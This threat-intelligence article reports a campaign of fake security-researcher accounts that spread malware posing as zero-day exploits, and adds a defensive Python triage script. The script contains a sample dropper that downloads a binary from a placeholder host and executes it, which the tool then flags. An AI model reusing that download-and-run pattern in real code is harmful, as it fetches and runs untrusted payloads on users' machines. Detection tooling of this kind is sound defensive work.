Exploit and vulnerability intelligence provider VulnCheck (https://vulncheck.com) has issued a warning over fake security researcher accounts distributing malware disguised as zero-day exploits for popular software. The campaign was discovered in early May 2023, when researchers found a GitHub repository hosting code that its author claimed to be a zero-day for the Signal messaging application. The cybersecurity firm continued finding such accounts on GitHub, offering what they claimed to be zero-day exploits for applications such as WhatsApp, Chrome, Discord, and Microsoft Exchange.
Recently, VulnCheck noticed that the campaign's operator has also started creating Twitter accounts that appear to belong to security researchers and using them to lure people to GitHub repositories hosting the fake zero-day exploits. The fake researcher accounts on Twitter carry profile pictures, in some cases the photos of known researchers, and claim an association with High Sierra Cyber Security, an entity that does not seem to exist. The person behind each Twitter profile has no LinkedIn profile posted, which on its own raises a simple doubt about the authenticity of the persona.
The code hosted in the GitHub repositories is designed to download a malicious binary and execute it. The downloaded binary can be a Windows or Linux file, depending on the victim’s operating system. A brief analysis of these binaries makes it obvious that they are malware.
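As an added illustration (not code from VulnCheck, Red Sky Alliance, or the campaign itself), the following Python script is a static triage check for a purported proof-of-concept: it parses the source and flags the shape described above, a network download paired with an execute call and an operating-system branch. Both sample inputs are constructed for the example; the only library used is the standard `ast` module.

```python
import ast
# Constructed sample, not the campaign's code: a "PoC" shaped like the ones described,
# fetching a Windows or Linux binary depending on the OS and then running it.
DROPPER_POC = '''
import platform, subprocess, urllib.request
def exploit(target):
    if platform.system() == "Windows":
        url, path = "http://example.invalid/payload.exe", "payload.exe"
    else:
        url, path = "http://example.invalid/payload", "./payload"
    urllib.request.urlretrieve(url, path)
    subprocess.Popen([path])
'''
# Constructed benign control: talks to the target but fetches and runs nothing.
BENIGN_POC = '''
import socket
def poc(host):
    s = socket.create_connection((host, 443))
    s.sendall(b"ping")
    return s.recv(64)
'''
DOWNLOAD_CALLS = {"urllib.request.urlretrieve", "urllib.request.urlopen", "requests.get"}
EXEC_CALLS = {"subprocess.Popen", "subprocess.run", "subprocess.call", "os.system", "os.startfile"}
PLATFORM_MARKERS = {"platform.system", "os.name", "sys.platform"}

def _dotted(node):
    """Render an attribute chain such as urllib.request.urlretrieve as one string."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def triage_poc(source):
    """Return the sorted indicator categories found in the given Python source."""
    found = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call) and _dotted(node.func) in DOWNLOAD_CALLS:
            found.add("download")
        elif isinstance(node, ast.Call) and _dotted(node.func) in EXEC_CALLS:
            found.add("execute")
        elif isinstance(node, ast.Attribute) and _dotted(node) in PLATFORM_MARKERS:
            found.add("platform_branch")
    return sorted(found)

def is_dropper_shaped(source):
    return {"download", "execute"} <= set(triage_poc(source))
```

A hit from `is_dropper_shaped` is a reason to read the code in a sandbox before running it, not proof of malice; a clean result only means this particular pattern is absent.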
The attacker has made a lot of effort to create all these fake personas, only to deliver obvious malware. It is unclear if they have been successful, but given that they have continued to pursue this avenue of attack, it seems they believe they will be, researchers said. The GitHub accounts seen by VulnCheck have been suspended, but the fake Twitter accounts are still online.
It is unclear if this is a campaign run by a threat actor or if it is part of some sort of experiment, but the cybersecurity community has been advised to act with caution when executing code from untrusted sources.
Sophisticated threat actors targeting security researchers is nothing new. In 2021, Google warned that North Korean hackers had delivered malware to security researchers after gaining their trust. North Korean cyber actors have been busy for years eliciting information from cyber professionals around the world.
See: https://redskyalliance.org/xindustry/no-good-deed-goes-unpunished
This article is presented at no charge for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225, or feedback@redskyalliance.com
- Reporting: https://www.redskyalliance.org/
- Website: https://www.redskyalliance.com/
- LinkedIn: https://www.linkedin.com/company/64265941
REDSHORTS - Weekly Cyber Intelligence Briefings: https://attendee.gotowebinar.com/register/5504229295967742989